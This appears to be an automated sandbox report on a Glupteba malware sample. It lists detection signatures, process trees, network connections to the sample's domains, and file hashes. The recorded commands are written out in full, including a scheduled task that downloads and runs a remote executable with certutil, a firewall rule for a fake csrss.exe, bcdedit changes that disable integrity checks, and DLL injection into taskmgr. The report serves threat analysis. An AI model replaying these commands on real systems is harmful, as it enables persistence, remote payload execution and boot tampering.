Analysis Overview
SHA256
fcbfc875faa86d1db822019f11632e5609462177b12a4f0083f3f0f88093e2f7
Threat Level: Known bad
The file 6da0370835d68a8974fcb588fecb3fbf was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Glupteba
MetaSploit
Modifies boot configuration data using bcdedit
Possible attempt to disable PatchGuard
Modifies Windows Firewall
Program crash
GoLang User-Agent
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-21 17:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-21 17:38
Reported
2024-01-21 17:41
Platform
win7-20231129-en
Max time kernel
0s
Max time network
132s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240121173852.log C:\Windows\Logs\CBS\CbsPersist_20240121173852.cab
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /197-197
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | 9c0e2ff7-2a45-47ec-97a7-2d9ce58e6af5.ninhaine.com | udp |
| US | 8.8.8.8:53 | server9.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard58.blob.core.windows.net | udp |
| US | 20.150.79.68:443 | vsblobprodscussu5shard58.blob.core.windows.net | tcp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server9.ninhaine.com | tcp |
| US | 199.59.243.225:80 | ww82.ninhaine.com | tcp |
Files
memory/3032-0-0x0000000002AF0000-0x0000000002F2D000-memory.dmp
memory/3032-1-0x0000000002AF0000-0x0000000002F2D000-memory.dmp
memory/3032-2-0x0000000002F30000-0x0000000003857000-memory.dmp
memory/3032-3-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2528-4-0x00000000028D0000-0x0000000002D0D000-memory.dmp
memory/3032-5-0x0000000000400000-0x000000000258E000-memory.dmp
memory/3032-6-0x0000000002F30000-0x0000000003857000-memory.dmp
memory/3032-7-0x0000000002AF0000-0x0000000002F2D000-memory.dmp
memory/2528-8-0x00000000028D0000-0x0000000002D0D000-memory.dmp
memory/2528-9-0x0000000000400000-0x000000000258E000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | 2c763260ff725d955728ac64dadf3958 |
| SHA1 | b335f3a6e525fd9e6ef60467160708d1c57ca545 |
| SHA256 | 227a58c88ea338cf0acaa3693a545880e63fa5bd58a97f09acb1843d88df7cc4 |
| SHA512 | ff2243ef68efb03460d25aabc74883d9c972a013c5d4061aef25d8bfb8eb73a493bcd76320d61c1ce0ecfa3890373cf6c92703a1a2de26f9d2f5c3e909d70cab |
C:\Windows\rss\csrss.exe
| MD5 | e0e462f7394a42e87d3cfa375cd94fc0 |
| SHA1 | 8f9fd17b3716621d937cc8579d44b4b5672365ac |
| SHA256 | b0193041bf4944a8ab2db47323b9a4e2d26e535cac2be88af6f23ad774a7ed99 |
| SHA512 | 6db6e5386b1db8c31e1529f0e5b933b860d3c25efcc938cd22134ad32431fcc6a7ccaa3ee5c5c699c45f4a673fbbe2dffbd9b67ac7a21acf2f98956f15087d37 |
memory/2416-18-0x0000000002590000-0x00000000029CD000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | c26036e7be1c7717ff2e3a804b2d75a3 |
| SHA1 | a0ec868a916a4e291b783efa195424955bf11cd9 |
| SHA256 | 95287ab95c5a2acc05c8a01d154de1bf719585fcbfd132416088512d74029e5b |
| SHA512 | 9f26f47f6acb614b52edcaca0d8c9123475464479c4e6dccd718963163e31b4dcaf624789fd26043f05de4893bf961a12eaa3a1f10d35bc88ae1b18bb10be8fd |
\Windows\rss\csrss.exe
| MD5 | d23cab124d8ccf930b2d1fad102fd2a7 |
| SHA1 | 0b13d0dd1c8f66ccb8cb8fb373eb6f7bbaf48781 |
| SHA256 | 09be4c8472334b9ec35bf3c1b97b0a2726e527e30a92408ee1854c1bb445966e |
| SHA512 | 649b860ff48bf46f91813f7b9e0ad2d1c56610b4f0a6ef5428878cc4fdeb11d7dc6634a5f2e0b27d54504cc8955757e91aecf4581d50b2142e242d9a51d2187b |
memory/2528-19-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-20-0x0000000002590000-0x00000000029CD000-memory.dmp
C:\Windows\rss\csrss.exe
| MD5 | fd785bbb06ce98864a925df95e16b8c5 |
| SHA1 | 03e4cc85670fc80cb6e98029645ea955fd5f2974 |
| SHA256 | 6d7011d41d349a0a28428df0cc114c1ba0238c8060d2298579ccbcc22d629ebe |
| SHA512 | f0bef8c21c154437503f02bb04e0da1381ab251c4f4b41883c3f46f77b3000f88f2208b3dfe56d76683fa6197be225d891a208c085f0a2b086be8debf0d28891 |
memory/2416-22-0x0000000000400000-0x000000000258E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | ee3339f6749c89218df70f883273a8a5 |
| SHA1 | b971f12080009f8de374c223fd3721528c9a8dfa |
| SHA256 | 4763e68a4c2bffa30f49b70564810915904412f53b2117df9af87a21a1873899 |
| SHA512 | 71852c25b487d367f368bb39f334cc76f06a1726880e1c71071a96809cd43bdb97a2bf5da54c3f1c5225100cf0e7ddf956986c10a4fc82be32f76a4e756d7c29 |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | 117b6ea2c794811428fea2fc25eae383 |
| SHA1 | d5673c2832adaa659badc1baa135420fc63ae889 |
| SHA256 | a89e6c0c06c2c8fcc7620d123dc81f1bbd0915c15dfae1e5c9c45af11b446996 |
| SHA512 | 52a20cd725c9ea068e6bae97c59b7716ef6fb844b578b55f16842a9006254a6e59afb25ba7dc0cdace243a576b75c10b8a910afaef526349f9892ab6631eafb3 |
memory/2612-41-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2612-42-0x0000000140000000-0x00000001405E8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 2741c1f51b156c3cc4d8354e7ece80fd |
| SHA1 | 595ad9adb7bb5a2fa6d0ea702a929fd9e92aae24 |
| SHA256 | c4c5e8302363960a159c38d0cb1e926e6703530f6caf858d4636ca0253213adb |
| SHA512 | 490d5fb5abaa72b42603bfc2660907dee82234cb0f88760ac9496edfe9c62a3673e979c5a51dbf34da0a9be8a7a4731853f0af51e0bf52863fc55f1cd961f9c8 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 40994b10b6ae95dcef1d22c91cae0ae9 |
| SHA1 | 85459e6b4eefcc0c15df157413a8fe6358dfa4d1 |
| SHA256 | 7dd45d5e762f72da56a5daf0d2bf4d1dc4255dff18422bbba099f7fbabd77d08 |
| SHA512 | e593475b72fb90e3a200a13dfd9540b5f155ee4c38d95cbb0f5db197f2167c7b35911479680c6fa75b36617fcc67fe7398ce670f05d789167372ed1500c64844 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | e5fb512f3dd17d1302f02f000dfe5693 |
| SHA1 | 95529fe6f04aa1039c8795d7550d1446762af009 |
| SHA256 | 5381925c4a34a536ba0c2fa93d391252d91ca5d453768feec133ad547ffe3c79 |
| SHA512 | fec4d96f82b32786dbdafd075b9f940298ba8654fbfa5cb18d14078e0fd95bacb61acdc532058fc71bc46f0824c0eca242641947956495bfc4c8910aadf5dbe9 |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 0791570b2d0769f0a251dde143c16bf4 |
| SHA1 | 40805bacf3116e06bd0453de7484858f4e1e7e82 |
| SHA256 | 7e36a77bc6ac8b20b50e036f9b59d09102027435b99874b6431b79b735b0f29f |
| SHA512 | c431e7fd6c2603f5310ab41dcb6036fa1eb479d5c020d446dc0348bc9a3ed97d31b0046db2e073ca7832c8bfc43c9d9f8a7212959009d9215bc54877400d0c9a |
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | bf78afa0bf26d0b7448b2f3a2acc32f4 |
| SHA1 | 9d8ab648e689f0a6ead9878ad33d21c8829b356b |
| SHA256 | a2148f29b2226818f37ddcc59743cefef0145defad6d4fca74210ca0ecef49dd |
| SHA512 | 71765cbd6754567987a7bbb451424e78260ad22ad159f9726746ac4db80192f51171818bd0490027bd8c2aff9fffbb3aa043e190e469518b57f97b88ca37024e |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | d71dff97ca86ca16c3db8bdb5285fb35 |
| SHA1 | 271c01246897497d069b81ed37af296cf6c1e498 |
| SHA256 | 4a19255504acfbd49c4e1aed722c7e62b50b5742b860eedabc5f46160f8aefac |
| SHA512 | 1fed2a183296b563e35d803927e539d28169895f6ca5b522a1c714f222a2d3e578b1e167b19568b5ad4800b898f7ac041c7bd8f6bb02d1361b32cbdcfb0f682a |
C:\Windows\Temp\Tar3597.tmp
| MD5 | 07a8f54a0752a9853479aeb2129f599d |
| SHA1 | 02d76478c642a21356716ecdf620ec4863936b71 |
| SHA256 | fa1e7fc24766633ae74bfefa9c10c11cc788862b8cfe5f75396b20aa84a4a593 |
| SHA512 | f23bb7376ac31bdcff8a7981dfd7711702113c9159cc7e3ddda520ae0c6f35b768d30755a8e2374196b47edf906dbc6e5d1fadfb5831f263d4c557211f2ad54f |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fbb403b06bae03197b6d95bd468d8527 |
| SHA1 | 09bb35f55ac81f51375a6122afe0ca4a26bf3800 |
| SHA256 | f50a04c75dc5be1b12a52cb163fd3ff176f24078f78fde575e7ecb3754e1157d |
| SHA512 | bd35baa4ec3187d5e70d0852853bab4abde2df4a4bd5e2a2ee35399870ec616539046e0bcb92406488bc9618187ea01836e76da02750d52c28534e7b7e1e5015 |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | d44640c7ac51cc9049e03edeee8b96fd |
| SHA1 | 37eb0fa6fd118d17b5455317d1ae639e7ef56251 |
| SHA256 | c5def655c89dded84a37a3dbbd84b907680f121dcd5ec20b8ef0823b34d4169b |
| SHA512 | 4a08b9c4d1908e7541457dd3cc6712c3509443a38053835943b602f2aac74c91f4c544dd0593d029d14b78a9cfcd9e3f0b638bfacfcb544fe129c76a837e1e1b |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
memory/2416-211-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-212-0x0000000002590000-0x00000000029CD000-memory.dmp
memory/2416-216-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-217-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-218-0x0000000000400000-0x000000000258E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | f0e11df20b7732e8fa70a359cb661c23 |
| SHA1 | 2d02b0d8c0c6b7bd2e1b90bfaf6e9a0d2c39a2fb |
| SHA256 | ddcea3218320cdc914a65e9b4b2d3fcc10dd482d1fa9edce8d7d05e3457f06e5 |
| SHA512 | c8eb0d1541e8a7256030b9990a54f27314a1bda82bbe99955dc7afbaec83163d460cc9007153d60aaf2780514700f7a0ab40c7e56001f11fe3a02ffae69c94ec |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 5da3a881ef991e8010deed799f1a5aaf |
| SHA1 | fea1acea7ed96d7c9788783781e90a2ea48c1a53 |
| SHA256 | f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4 |
| SHA512 | 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09 |
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 38b7eabd6a868cdfebcb09d110c67825 |
| SHA1 | 7225a012527be250763f52d14250ff0556ac8a9e |
| SHA256 | 42ef174b129710297bdde703f78941a7d711aa5544751fa610fdfc413ea0bfbe |
| SHA512 | 5655e52d7506b00e40968a1131be1684d8bf09f60e87493d63ed9337f5d90d899ff198c110bbcf2bae594b6f22d126171b3dfeda4538ba456dcac7bbfe18cb41 |
memory/2416-271-0x0000000000400000-0x000000000258E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2416-301-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-302-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-303-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-328-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-329-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-330-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-331-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-332-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-333-0x0000000000400000-0x000000000258E000-memory.dmp
memory/2416-334-0x0000000000400000-0x000000000258E000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-21 17:38
Reported
2024-01-21 17:41
Platform
win10v2004-20231222-en
Max time kernel
1s
Max time network
146s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 344
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 688
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 736
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 708
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 756
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 616
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 632
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 876
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592
